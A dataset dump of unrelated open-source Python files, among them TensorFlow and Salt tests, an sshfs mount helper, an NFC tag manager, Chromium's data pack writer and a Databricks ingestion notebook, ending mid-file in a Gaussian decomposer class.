text
stringlengths 2
999k
|
|---|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for contrib.seq2seq.python.ops.seq2seq."""
# pylint: disable=unused-import,g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: enable=unused-import
import tensorflow as tf
from tensorflow.contrib import layers
class Seq2SeqTest(tf.test.TestCase):
# test a default call of rnn_decoder
def test_rnn_decoder(self):
pass
# test default call with time_major=True
def test_dynamic_rnn_decoder_time_major(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=
tf.constant_initializer(0.5)) as varscope:
# Define inputs/outputs to model
batch_size = 2
encoder_embedding_size = 3
decoder_embedding_size = 4
encoder_hidden_size = 5
decoder_hidden_size = encoder_hidden_size
input_sequence_length = 6
decoder_sequence_length = 7
num_decoder_symbols = 20
start_of_sequence_id = end_of_sequence_id = 1
decoder_embeddings = tf.get_variable('decoder_embeddings',
[num_decoder_symbols, decoder_embedding_size],
initializer=tf.random_normal_initializer(stddev=0.1))
inputs = tf.constant(0.5, shape=[input_sequence_length, batch_size,
encoder_embedding_size])
decoder_inputs = tf.constant(0.4, shape=[decoder_sequence_length,
batch_size,
decoder_embedding_size])
decoder_length = tf.constant(decoder_sequence_length, dtype=tf.int32,
shape=[batch_size,])
with tf.variable_scope("rnn") as scope:
# setting up weights for computing the final output
output_fn = lambda x: layers.linear(x, num_decoder_symbols,
scope=scope)
# Define model
encoder_outputs, encoder_state = tf.nn.dynamic_rnn(
cell=tf.nn.rnn_cell.GRUCell(encoder_hidden_size), inputs=inputs,
dtype=tf.float32, time_major=True, scope=scope)
with tf.variable_scope("decoder") as scope:
# Train decoder
decoder_cell = tf.nn.rnn_cell.GRUCell(decoder_hidden_size)
decoder_fn_train = tf.contrib.seq2seq.simple_decoder_fn_train(
encoder_state=encoder_state)
decoder_outputs_train, decoder_state_train = (
tf.contrib.seq2seq.dynamic_rnn_decoder(
cell=decoder_cell,
decoder_fn=decoder_fn_train,
inputs=decoder_inputs,
sequence_length=decoder_length,
time_major=True,
scope=scope))
decoder_outputs_train = output_fn(decoder_outputs_train)
# Setup variable reuse
scope.reuse_variables()
# Inference decoder
decoder_fn_inference = (
tf.contrib.seq2seq.simple_decoder_fn_inference(
output_fn=output_fn,
encoder_state=encoder_state,
embeddings=decoder_embeddings,
start_of_sequence_id=start_of_sequence_id,
end_of_sequence_id=end_of_sequence_id,
#TODO: find out why it goes to +1
maximum_length=decoder_sequence_length-1,
num_decoder_symbols=num_decoder_symbols,
dtype=tf.int32))
decoder_outputs_inference, decoder_state_inference = (
tf.contrib.seq2seq.dynamic_rnn_decoder(
cell=decoder_cell,
decoder_fn=decoder_fn_inference,
time_major=True,
scope=scope))
# Run model
tf.global_variables_initializer().run()
decoder_outputs_train_res, decoder_state_train_res = sess.run(
[decoder_outputs_train, decoder_state_train])
decoder_outputs_inference_res, decoder_state_inference_res = sess.run(
[decoder_outputs_inference, decoder_state_inference])
# Assert outputs
self.assertEqual((decoder_sequence_length, batch_size,
num_decoder_symbols),
decoder_outputs_train_res.shape)
self.assertEqual((batch_size, num_decoder_symbols),
decoder_outputs_inference_res.shape[1:3])
self.assertEqual((batch_size, decoder_hidden_size),
decoder_state_train_res.shape)
self.assertEqual((batch_size, decoder_hidden_size),
decoder_state_inference_res.shape)
# The dynamic decoder might end earlier than `maximal_length`
# under inference
true_value = (decoder_sequence_length>=
decoder_state_inference_res.shape[0])
self.assertEqual((true_value), True)
if __name__ == '__main__':
tf.test.main()
|
from edb import Resource
import json
# Create resources on in the database. Does nothing if they already exists.
# For convinience; create() returns the Resource object.
my_list: list = Resource("my_list").create(list())
my_dictionary: dict = Resource("my_dictionary").create(dict())
# Dictionary
my_dictionary["a_new_key"] = "my_value"
print(
my_dictionary["a_new_key"], # This returns as expected 'my_value'
len(my_dictionary), # Returns 1 (there is one key in the dictionary)
)
my_dictionary.delete() # This delete the resource on the server, returns None
# List
for i in "abcdefghij":
my_list.append(i)
print(
len(my_list), # Returns 10
my_list[4], # Returns e
my_list[3:], # Returns ['d', 'e', 'f', 'g', 'h', 'i', 'j']
)
# Updating a resource when the elements point to a collection type.
# For now you will have to get the element, update it localy and then update the database with the new data
new_list = Resource("new_list").create(list())
new_list.append([1, 2, 3])
print(new_list) # Returns [[1, 2, 3]]
# Extend the element
l = new_list[0] # Create a local copy
l.extend([4, 5, 6]) # Update the element localy
new_list[0] = l # Update the database
print(new_list) # Returns [[1, 2, 3, 4, 5, 6]]
# Example with dictionary in list resource
users = Resource("users").create(list())
for i in range(3):
user = {
"id": i,
"name": "Trololo Guy",
}
users.append(user)
print(
users
) # [{'id': 0, 'name': 'Trololo Guy'}, {'id': 1, 'name': 'Trololo Guy'}, {'id': 2, 'name': 'Trololo Guy'}]
|
import os
import subprocess
from huntsman.pocs.utils import DummyLogger
from huntsman.pocs.utils.config import query_config_server, load_device_config
def mount(mountpoint, remote, server_alive_interval=20, logger=None,
server_alive_count_max=3, strict_host_key_checking=False):
'''
Mount remote on local.
Arguments
---------
strict_host_key_checking:
Should be False to avoid user interaction when running in a docker
container.
'''
if logger is None:
logger = DummyLogger()
logger.debug(f'Mounting {remote} on {mountpoint}...')
try:
os.makedirs(mountpoint, exist_ok=True)
except FileExistsError:
pass # For some reason this is necessary
# SSH options
strict_host_key_checking = "yes" if strict_host_key_checking else "no"
options = f'ServerAliveInterval={server_alive_interval},' + \
f'ServerAliveCountMax={server_alive_count_max},' + \
f'StrictHostKeyChecking={strict_host_key_checking}'
options = ['sshfs', remote, mountpoint, '-o', options]
try:
subprocess.run(options, shell=False, check=True)
logger.info(f'Successfully mounted {remote} at {mountpoint}!')
except Exception as e:
logger.error(f'Failed to mount {remote} at {mountpoint}: {e}')
raise(e)
def unmount(mountpoint, logger=None):
'''
Unmount remote from local.
'''
if os.path.isdir(mountpoint):
options = ['fusermount', '-u', mountpoint]
try:
subprocess.run(options, shell=False, check=True)
except Exception:
if logger is None:
logger = DummyLogger()
logger.warning(f'Unable to unmount {mountpoint}.')
def get_user(default='huntsman', key='PANUSER', logger=None):
'''
Return the user.
'''
if key in os.environ:
user = os.environ[key]
else:
user = default
msg = f'{key} environment variable not found. Using f{default} as user.'
if logger is None:
logger = DummyLogger()
logger.warning(msg)
return user
def mount_images_dir(logger=None, user=None, mountpoint=None, config=None,
**kwargs):
'''
Mount the images directory from the NGAS server to the local device.
'''
# Setup the logger
if logger is None:
logger = DummyLogger()
# Load the config
if config is None:
config = load_device_config(logger=logger, **kwargs)
# Specify user for SSHFS connection
if user is None:
user = get_user(logger=logger)
# Specify the mount point on the local device
if mountpoint is None:
mountpoint = config['directories']['images']
# Retrieve the IP of the remote
remote_ip = query_config_server(key='control', logger=logger,
)['ip_address']
# Specify the remote directory
remote_dir = query_config_server(key='control',
logger=logger)['directories']['images']
remote = f"{user}@{remote_ip}:{remote_dir}"
# Mount
mount(mountpoint, remote, logger=logger)
return mountpoint
|
import json
import logging
import os
import time
import yaml
from .socketio import socketio
from .models import db, NFCTagModel
from flask import current_app
from musicfig import colors
from sqlalchemy import func
logger = logging.getLogger(__name__)
# all uses of current_app in here are for config; try just passing those
# config values, mayhap?
class NFCTagOperationError(BaseException):
pass
class NFCTag():
@classmethod
def get_friendly_name(cls):
"""
hacky - but effective - way to get the friendly name of this class.
Brittle because it assumes the class name ends in "Tag"
Override if not working
"""
return cls.__name__[0:-3].lower()
@classmethod
def _get_required_attributes(cls):
return cls.required_attributes if hasattr(cls, 'required_attributes') else []
@classmethod
def get_attributes_description(cls):
json_content = ",".join(['"%s": "..."' % att for att in cls._get_required_attributes()])
return "{%s}" % json_content
def __init__(self, identifier, name=None, description=None, attributes={}, **kwargs):
self.identifier = identifier
self.name = name
self.description = description
self.attributes = attributes
self.logger = logging.getLogger("musicfig")
self._init_attributes()
def _init_attributes(self):
self._verify_attributes()
def _verify_attributes(self):
# unclear if this will work...
for required_attribute in self._get_required_attributes():
if required_attribute not in self.attributes:
raise KeyError("missing required key '%s'" % required_attribute)
def get_type(self):
return self.__class__.__name__.lower().replace("Tag", "")
def on_add(self):
pass
def on_remove(self):
pass
def get_pad_color(self):
return colors.OFF
def should_do_light_show(self):
return True
def should_use_class_based_execution(self):
return True
class UnregisteredTag(NFCTag):
"""
This is used for tags which have not been added to the database
"""
def on_add(self):
super().on_add()
# should _probably_ use a logger which is associated with the
# app, but this is fine for now. Maybe
logger.info('Discovered new tag: %s' % self.identifier)
socketio.emit("new_tag", {"tag_id": self.identifier})
def get_pad_color(self):
return colors.RED
class UnknownTypeTag(NFCTag):
"""
This is used in cases where tags are persisted to the database but then a plugin is removed
or unregistered; those orphan tags will be represented by this type
"""
def get_pad_color(self):
return colors.RED
def should_use_class_based_execution(self):
return False
class NFCTagStore():
tag_cache = {}
@staticmethod
def get_last_updated_time():
latest_nfc_tag = NFCTagModel.query.order_by(NFCTagModel.last_updated.desc()).first()
return 0 if latest_nfc_tag is None else latest_nfc_tag.last_updated
@staticmethod
def get_number_of_nfc_tags():
return db.session.query(func.count(NFCTagModel.id))
@staticmethod
def populate_from_dict(nfc_tag_dict):
"""
Expects nfc tag dict with the keys as unique identifiers and the
values as the configuration information. This will be parsed and
certain keywords will be pulled into explicit fields and removed
from the config:
- name or _name (the former overrules) -> `name`
- desc or description (the latter overrules) -> `description`
- type -> `type`
Everything that is remaining will be encoded as json and stored in
the `attr` field
"""
before = NFCTagStore.get_number_of_nfc_tags()
def convert_one(k, v, curtime):
id = k
# these double-pops actually pull both of the keys from the dictionary;
# this is intentional as we don't want them to stick around afterward
name = v.pop("name", v.pop("_name", None))
desc = v.pop("description", v.pop("desc", None))
nfc_tag_type = v.pop("type", None)
attr = json.dumps(v)
return NFCTagModel(id=id, name=name, description=desc,
type=nfc_tag_type, attr=attr, last_updated=curtime)
cur_time = NFCTagStore.get_current_timestamp()
for k, v in nfc_tag_dict.items():
nfc_tag_model = convert_one(k, v, cur_time)
db.session.add(nfc_tag_model)
db.session.commit()
after = NFCTagStore.get_number_of_nfc_tags()
logger.info("added %s tags; before: %s, after: %s", len(nfc_tag_dict.items()), before, after)
@staticmethod
def get_current_timestamp():
return int(time.time())
@staticmethod
def get_all_nfc_tags():
return NFCTagModel.query.all()
@staticmethod
def get_nfc_tag_by_id(id):
return NFCTagModel.query.filter(NFCTagModel.id == id).first()
@staticmethod
def delete_nfc_tag_by_id(id):
to_delete = NFCTagModel.query.filter(NFCTagModel.id == id).first()
db.session.delete(to_delete)
db.session.commit()
return True
@staticmethod
def create_nfc_tag(id, type, name=None, description=None, attributes=None):
model = NFCTagModel(id=id, name=name, description=description, type=type,
attr=attributes, last_updated=NFCTagStore.get_current_timestamp())
db.session.add(model)
db.session.commit()
return model
class NFCTagManager():
# todo; merge this class with NFCTagStore
def __init__(self):
self.nfc_tags_file = current_app.config.get("NFC_TAG_FILE")
self.last_updated = -1
self.tags = {}
self._tags = {}
if self.should_import_file():
self.import_file()
instance = None
@classmethod
def get_instance(cls):
if cls.instance is None:
cls.instance = NFCTagManager()
return cls.instance
TAG_REGISTRY_MAP = {}
@classmethod
def register_tag_type(cls, nfc_tag_class):
if not issubclass(nfc_tag_class, NFCTag):
raise TypeError("`nfc_tag_class` must be a class object which extends NFCTag")
cls.TAG_REGISTRY_MAP[nfc_tag_class.get_friendly_name()] = nfc_tag_class
@classmethod
def get_tag_class_from_tag_type(cls, nfc_tag_type: str):
return cls.TAG_REGISTRY_MAP.get(nfc_tag_type, UnknownTypeTag)
@classmethod
def get_registered_tag_types(cls):
"""
Fetches a dictionary of all the registered tag types in the format `type_str` -> `type_class_obj`
Note
"""
return cls.TAG_REGISTRY_MAP
def should_import_file(self):
"""
This is not a super smart way of doing things, but it should work. tl;dr,
if the modified time of the yaml file is more recent than the most recent
modified time of any nfc_tag in the db, then we should update.
*** note, this is destructive in nature; yaml will completely overwrite
the database ***
"""
if not os.path.isfile(self.nfc_tags_file):
return False
last_db_update = NFCTagStore.get_last_updated_time()
last_file_update = int(os.stat(self.nfc_tags_file).st_mtime)
logger.info("last db updated: %s, last file updated: %s", last_db_update, last_file_update)
return last_file_update > last_db_update
def import_file(self):
with open(self.nfc_tags_file, 'r') as f:
nfc_tag_defs = yaml.load(f, Loader=yaml.FullLoader)
NFCTagStore.populate_from_dict(nfc_tag_defs)
def nfc_tag_from_model(self, nfc_tag_model):
# TODO build a composite tag in case we want to do e.g. spotify + webhook;
# perhaps do a list of types or something?
nfc_tag_class = NFCTagManager.get_tag_class_from_tag_type(nfc_tag_model.type)
return nfc_tag_class(nfc_tag_model.id,
name=nfc_tag_model.name,
description=nfc_tag_model.description,
attributes=nfc_tag_model.get_attr_object()
)
def get_nfc_tag_by_id(self, id):
"""
Looks everywhere for a tag which is registered. Will return either
old-style or new-style tags, depending on which store it comes from.
New style will override old style
"""
if id not in self.tags:
nfc_tag_model = NFCTagStore.get_nfc_tag_by_id(id)
if nfc_tag_model is None:
nfc_tag = UnregisteredTag(id)
else:
nfc_tag = self.nfc_tag_from_model(nfc_tag_model)
logger.debug("built tag of type %s from info %s", type(nfc_tag), nfc_tag_model)
self.tags[id] = nfc_tag
return self.tags.get(id)
def delete_nfc_tag_by_id(self, id):
if id is None:
return
try:
self.tags.pop(id)
except Exception:
pass
success = NFCTagStore.delete_nfc_tag_by_id(id)
socketio.emit("tag_deleted", {"tag_id": id})
def create_nfc_tag(self, id, tag_type, name=None, description=None, attributes=None):
if id is None or tag_type is None:
raise ValueError("must include both id and tag_type")
if NFCTagManager.get_tag_class_from_tag_type(tag_type) is UnknownTypeTag:
raise ValueError("tag_type was %s, must be one of the following: [%s]",
tag_type, "],[".join(NFCTagManager.get_registered_tag_types().keys()))
if isinstance(attributes, dict):
attributes = json.dumps(dict)
model_obj = NFCTagStore.create_nfc_tag(id, tag_type, name, description, attributes)
nfc_tag = self.nfc_tag_from_model(model_obj)
self.tags[id] = nfc_tag
return nfc_tag
|
import pytest
from trydjango.users.models import User
from trydjango.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Support for formatting a data pack file used for platform agnostic resource
files.
"""
from __future__ import print_function
import collections
import os
import struct
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import six
from grit import util
from grit.node import include
from grit.node import message
from grit.node import structure
PACK_FILE_VERSION = 5
BINARY, UTF8, UTF16 = range(3)
GrdInfoItem = collections.namedtuple('GrdInfoItem',
['textual_id', 'id', 'path'])
class WrongFileVersion(Exception):
pass
class CorruptDataPack(Exception):
pass
class DataPackSizes(object):
def __init__(self, header, id_table, alias_table, data):
self.header = header
self.id_table = id_table
self.alias_table = alias_table
self.data = data
@property
def total(self):
return sum(v for v in self.__dict__.values())
def __iter__(self):
yield ('header', self.header)
yield ('id_table', self.id_table)
yield ('alias_table', self.alias_table)
yield ('data', self.data)
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
return self.__class__.__name__ + repr(self.__dict__)
class DataPackContents(object):
def __init__(self, resources, encoding, version, aliases, sizes):
# Map of resource_id -> str.
self.resources = resources
# Encoding (int).
self.encoding = encoding
# Version (int).
self.version = version
# Map of resource_id->canonical_resource_id
self.aliases = aliases
# DataPackSizes instance.
self.sizes = sizes
def Format(root, lang='en', output_dir='.'):
"""Writes out the data pack file format (platform agnostic resource file)."""
id_map = root.GetIdMap()
data = {}
root.info = []
for node in root.ActiveDescendants():
with node:
if isinstance(node, (include.IncludeNode, message.MessageNode,
structure.StructureNode)):
value = node.GetDataPackValue(lang, util.BINARY)
if value is not None:
resource_id = id_map[node.GetTextualIds()[0]]
data[resource_id] = value
root.info.append('{},{},{}'.format(
node.attrs.get('name'), resource_id, node.source))
return WriteDataPackToString(data, UTF8)
def ReadDataPack(input_file):
return ReadDataPackFromString(util.ReadFile(input_file, util.BINARY))
def ReadDataPackFromString(data):
"""Reads a data pack file and returns a dictionary."""
# Read the header.
version = struct.unpack('<I', data[:4])[0]
if version == 4:
resource_count, encoding = struct.unpack('<IB', data[4:9])
alias_count = 0
header_size = 9
elif version == 5:
encoding, resource_count, alias_count = struct.unpack('<BxxxHH', data[4:12])
header_size = 12
else:
raise WrongFileVersion('Found version: ' + str(version))
resources = {}
kIndexEntrySize = 2 + 4 # Each entry is a uint16 and a uint32.
def entry_at_index(idx):
offset = header_size + idx * kIndexEntrySize
return struct.unpack('<HI', data[offset:offset + kIndexEntrySize])
prev_resource_id, prev_offset = entry_at_index(0)
for i in range(1, resource_count + 1):
resource_id, offset = entry_at_index(i)
resources[prev_resource_id] = data[prev_offset:offset]
prev_resource_id, prev_offset = resource_id, offset
id_table_size = (resource_count + 1) * kIndexEntrySize
# Read the alias table.
kAliasEntrySize = 2 + 2 # uint16, uint16
def alias_at_index(idx):
offset = header_size + id_table_size + idx * kAliasEntrySize
return struct.unpack('<HH', data[offset:offset + kAliasEntrySize])
aliases = {}
for i in range(alias_count):
resource_id, index = alias_at_index(i)
aliased_id = entry_at_index(index)[0]
aliases[resource_id] = aliased_id
resources[resource_id] = resources[aliased_id]
alias_table_size = kAliasEntrySize * alias_count
sizes = DataPackSizes(
header_size, id_table_size, alias_table_size,
len(data) - header_size - id_table_size - alias_table_size)
assert sizes.total == len(data), 'original={} computed={}'.format(
len(data), sizes.total)
return DataPackContents(resources, encoding, version, aliases, sizes)
def WriteDataPackToString(resources, encoding):
"""Returns bytes with a map of id=>data in the data pack format."""
ret = []
# Compute alias map.
resource_ids = sorted(resources)
# Use reversed() so that for duplicates lower IDs clobber higher ones.
id_by_data = {resources[k]: k for k in reversed(resource_ids)}
# Map of resource_id -> resource_id, where value < key.
alias_map = {k: id_by_data[v] for k, v in resources.items()
if id_by_data[v] != k}
# Write file header.
resource_count = len(resources) - len(alias_map)
# Padding bytes added for alignment.
ret.append(struct.pack('<IBxxxHH', PACK_FILE_VERSION, encoding,
resource_count, len(alias_map)))
HEADER_LENGTH = 4 + 4 + 2 + 2
# Each main table entry is: uint16 + uint32 (and an extra entry at the end).
# Each alias table entry is: uint16 + uint16.
data_offset = HEADER_LENGTH + (resource_count + 1) * 6 + len(alias_map) * 4
# Write main table.
index_by_id = {}
deduped_data = []
index = 0
for resource_id in resource_ids:
if resource_id in alias_map:
continue
data = resources[resource_id]
if isinstance(data, six.text_type):
data = data.encode('utf-8')
index_by_id[resource_id] = index
ret.append(struct.pack('<HI', resource_id, data_offset))
data_offset += len(data)
deduped_data.append(data)
index += 1
assert index == resource_count
# Add an extra entry at the end.
ret.append(struct.pack('<HI', 0, data_offset))
# Write alias table.
for resource_id in sorted(alias_map):
index = index_by_id[alias_map[resource_id]]
ret.append(struct.pack('<HH', resource_id, index))
# Write data.
ret.extend(deduped_data)
return b''.join(ret)
def WriteDataPack(resources, output_file, encoding):
"""Writes a map of id=>data into output_file as a data pack."""
content = WriteDataPackToString(resources, encoding)
with open(output_file, 'wb') as file:
file.write(content)
def ReadGrdInfo(grd_file):
info_dict = {}
with open(grd_file + '.info', 'rt') as f:
for line in f:
item = GrdInfoItem._make(line.strip().split(','))
info_dict[int(item.id)] = item
return info_dict
def RePack(output_file, input_files, whitelist_file=None,
suppress_removed_key_output=False,
output_info_filepath=None):
"""Write a new data pack file by combining input pack files.
Args:
output_file: path to the new data pack file.
input_files: a list of paths to the data pack files to combine.
whitelist_file: path to the file that contains the list of resource IDs
that should be kept in the output file or None to include
all resources.
suppress_removed_key_output: allows the caller to suppress the output from
RePackFromDataPackStrings.
output_info_file: If not None, specify the output .info filepath.
Raises:
KeyError: if there are duplicate keys or resource encoding is
inconsistent.
"""
input_data_packs = [ReadDataPack(filename) for filename in input_files]
input_info_files = [filename + '.info' for filename in input_files]
whitelist = None
if whitelist_file:
lines = util.ReadFile(whitelist_file, 'utf-8').strip().splitlines()
if not lines:
raise Exception('Whitelist file should not be empty')
whitelist = set(int(x) for x in lines)
inputs = [(p.resources, p.encoding) for p in input_data_packs]
resources, encoding = RePackFromDataPackStrings(
inputs, whitelist, suppress_removed_key_output)
WriteDataPack(resources, output_file, encoding)
if output_info_filepath is None:
output_info_filepath = output_file + '.info'
with open(output_info_filepath, 'w') as output_info_file:
for filename in input_info_files:
with open(filename, 'r') as info_file:
output_info_file.writelines(info_file.readlines())
def RePackFromDataPackStrings(inputs, whitelist,
suppress_removed_key_output=False):
"""Combines all inputs into one.
Args:
inputs: a list of (resources_by_id, encoding) tuples to be combined.
whitelist: a list of resource IDs that should be kept in the output string
or None to include all resources.
suppress_removed_key_output: Do not print removed keys.
Returns:
Returns (resources_by_id, encoding).
Raises:
KeyError: if there are duplicate keys or resource encoding is
inconsistent.
"""
resources = {}
encoding = None
for input_resources, input_encoding in inputs:
# Make sure we have no dups.
duplicate_keys = set(input_resources.keys()) & set(resources.keys())
if duplicate_keys:
raise KeyError('Duplicate keys: ' + str(list(duplicate_keys)))
# Make sure encoding is consistent.
if encoding in (None, BINARY):
encoding = input_encoding
elif input_encoding not in (BINARY, encoding):
raise KeyError('Inconsistent encodings: ' + str(encoding) +
' vs ' + str(input_encoding))
if whitelist:
whitelisted_resources = dict([(key, input_resources[key])
for key in input_resources.keys()
if key in whitelist])
resources.update(whitelisted_resources)
removed_keys = [key for key in input_resources.keys()
if key not in whitelist]
if not suppress_removed_key_output:
for key in removed_keys:
print('RePackFromDataPackStrings Removed Key:', key)
else:
resources.update(input_resources)
# Encoding is 0 for BINARY, 1 for UTF8 and 2 for UTF16
if encoding is None:
encoding = BINARY
return resources, encoding
def main():
# Write a simple file.
data = {1: '', 4: 'this is id 4', 6: 'this is id 6', 10: ''}
WriteDataPack(data, 'datapack1.pak', UTF8)
data2 = {1000: 'test', 5: 'five'}
WriteDataPack(data2, 'datapack2.pak', UTF8)
print('wrote datapack1 and datapack2 to current directory.')
if __name__ == '__main__':
main()
|
# Databricks notebook source
# MAGIC %md
# MAGIC ### Ingest results.json file
# COMMAND ----------
dbutils.widgets.text("p_data_source", "")
v_data_source = dbutils.widgets.get("p_data_source")
# COMMAND ----------
dbutils.widgets.text("p_file_date", "2021-03-28")
v_file_date = dbutils.widgets.get("p_file_date")
# COMMAND ----------
# MAGIC %run "../includes/configuration"
# COMMAND ----------
# MAGIC %run "../includes/common_functions"
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 1 - Read the JSON file using the spark dataframe reader API
# COMMAND ----------
from pyspark.sql.types import StructType, StructField, IntegerType, StringType, FloatType
# COMMAND ----------
results_schema = StructType(fields=[StructField("resultId", IntegerType(), False),
StructField("raceId", IntegerType(), True),
StructField("driverId", IntegerType(), True),
StructField("constructorId", IntegerType(), True),
StructField("number", IntegerType(), True),
StructField("grid", IntegerType(), True),
StructField("position", IntegerType(), True),
StructField("positionText", StringType(), True),
StructField("positionOrder", IntegerType(), True),
StructField("points", FloatType(), True),
StructField("laps", IntegerType(), True),
StructField("time", StringType(), True),
StructField("milliseconds", IntegerType(), True),
StructField("fastestLap", IntegerType(), True),
StructField("rank", IntegerType(), True),
StructField("fastestLapTime", StringType(), True),
StructField("fastestLapSpeed", FloatType(), True),
StructField("statusId", StringType(), True)])
# COMMAND ----------
results_df = spark.read \
.schema(results_schema) \
.json(f"{raw_folder_path}/{v_file_date}/results.json")
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 2 - Rename columns and add new columns
# COMMAND ----------
from pyspark.sql.functions import lit
# COMMAND ----------
results_with_columns_df = results_df.withColumnRenamed("resultId", "result_id") \
.withColumnRenamed("raceId", "race_id") \
.withColumnRenamed("driverId", "driver_id") \
.withColumnRenamed("constructorId", "constructor_id") \
.withColumnRenamed("positionText", "position_text") \
.withColumnRenamed("positionOrder", "position_order") \
.withColumnRenamed("fastestLap", "fastest_lap") \
.withColumnRenamed("fastestLapTime", "fastest_lap_time") \
.withColumnRenamed("fastestLapSpeed", "fastest_lap_speed") \
.withColumn("data_source", lit(v_data_source)) \
.withColumn("file_date", lit(v_file_date))
# COMMAND ----------
results_with_ingestion_date_df = add_ingestion_date(results_with_columns_df)
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 3 - Drop the unwanted column
# COMMAND ----------
from pyspark.sql.functions import col
# COMMAND ----------
results_final_df = results_with_ingestion_date_df.drop(col("statusId"))
# COMMAND ----------
# MAGIC %md
# MAGIC De-dupe the dataframe
# COMMAND ----------
results_deduped_df = results_final_df.dropDuplicates(['race_id', 'driver_id'])
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 4 - Write to output to processed container in parquet format
# COMMAND ----------
# MAGIC %md
# MAGIC Method 1
# COMMAND ----------
# for race_id_list in results_final_df.select("race_id").distinct().collect():
# if (spark._jsparkSession.catalog().tableExists("f1_processed.results")):
# spark.sql(f"ALTER TABLE f1_processed.results DROP IF EXISTS PARTITION (race_id = {race_id_list.race_id})")
# COMMAND ----------
# results_final_df.write.mode("append").partitionBy('race_id').format("parquet").saveAsTable("f1_processed.results")
# COMMAND ----------
# MAGIC %md
# MAGIC Method 2
# COMMAND ----------
# overwrite_partition(results_final_df, 'f1_processed', 'results', 'race_id')
# COMMAND ----------
merge_condition = "tgt.result_id = src.result_id AND tgt.race_id = src.race_id"
merge_delta_data(results_deduped_df, 'f1_processed', 'results', processed_folder_path, merge_condition, 'race_id')
# COMMAND ----------
dbutils.notebook.exit("Success")
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT COUNT(1)
# MAGIC FROM f1_processed.results;
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT race_id, driver_id, COUNT(1)
# MAGIC FROM f1_processed.results
# MAGIC GROUP BY race_id, driver_id
# MAGIC HAVING COUNT(1) > 1
# MAGIC ORDER BY race_id, driver_id DESC;
# COMMAND ----------
# MAGIC %sql SELECT * FROM f1_processed.results WHERE race_id = 540 AND driver_id = 229;
# COMMAND ----------
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def SnapshotFault(vim, *args, **kwargs):
'''Base type for Snapshot-related errors.'''
obj = vim.client.factory.create('{urn:vim25}SnapshotFault')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 5 arguments got: %d' % len(args))
required = [ 'dynamicProperty', 'dynamicType', 'faultCause', 'faultMessage' ]
optional = [ ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
|
# -*- coding: utf-8 -*-
'''
Tests for the rabbitmq state
'''
# Import python libs
from __future__ import absolute_import
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import skip_if_not_root
from tests.support.mixins import SaltReturnAssertsMixin
@skip_if_not_root
class RabbitVHostTestCase(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the rabbitmq virtual host states.
'''
def setUp(self):
super(RabbitVHostTestCase, self).setUp()
rabbit_installed = self.run_function('cmd.has_exec', ['rabbitmqctl'])
if not rabbit_installed:
self.skipTest('rabbitmq-server not installed')
def test_present(self):
'''
rabbitmq_vhost.present null_host
'''
ret = self.run_state(
'rabbitmq_vhost.present', name='null_host', test=True
)
self.assertSaltFalseReturn(ret)
def absent(self):
'''
rabbitmq_vhost.absent null_host
'''
ret = self.run_state(
'rabbitmq_vhost.absent', name='null_host', test=True
)
self.assertSaltFalseReturn(ret)
|
from setuptools import setup
setup(name='barman_exporter',
version='1.0.7',
description='Barman exporter for Prometheus',
long_description='Barman exporter for Prometheus. Full description at https://github.com/ahes/prometheus-barman-exporter',
url='https://github.com/ahes/prometheus-barman-exporter',
author='Marcin Hlybin',
author_email='marcin.hlybin@gmail.com',
license='MIT',
packages=['barman_exporter'],
keywords='prometheus barman exporter barman-exporter',
entry_points={
'console_scripts': ['barman-exporter=barman_exporter.barman_exporter:main'],
},
install_requires=[
'prometheus-client',
'sh'
],
zip_safe=False)
|
import os
import pickle
# from matplotlib import pyplot as plt
import numpy as np
from . import AGD_decomposer
from . import gradient_descent
from . import ioHDF5
class GaussianDecomposer(object):
def __init__(self, filename=None, phase="one"):
if filename:
temp = pickle.load(open(filename, "rb"))
self.p = temp.p
else:
self.p = {
"alpha1": None,
"alpha2": None,
"alpha_em": None,
"alpha1_em": None,
"alpha2_em": None,
"training_results": None,
"phase": "one",
"SNR2_thresh": 5.0,
"SNR_thresh": 5.0,
"SNR_em": 5.0,
"wiggle": 0.1,
"drop_width": 10,
"min_dv": 0,
"deblend": True,
"mode": "python",
"BLFrac": 0.1,
"verbose": False,
# "plot": False,
"perform_final_fit": True,
}
def load_training_data(self, filename):
self.p["training_data"] = pickle.load(open(filename, "rb"))
def load_hdf5_data(self, filename):
return ioHDF5.fromHDF5(filename)
def dump_hdf5_data(self, data, filename):
ioHDF5.toHDF5(data, filename)
def train(
self,
alpha1_initial=None,
alpha2_initial=None,
# plot=False,
verbose=False,
mode="python",
learning_rate=0.9,
eps=0.25,
MAD=0.1,
):
""" Solve for optimal values of alpha1 (and alpha2) using training data """
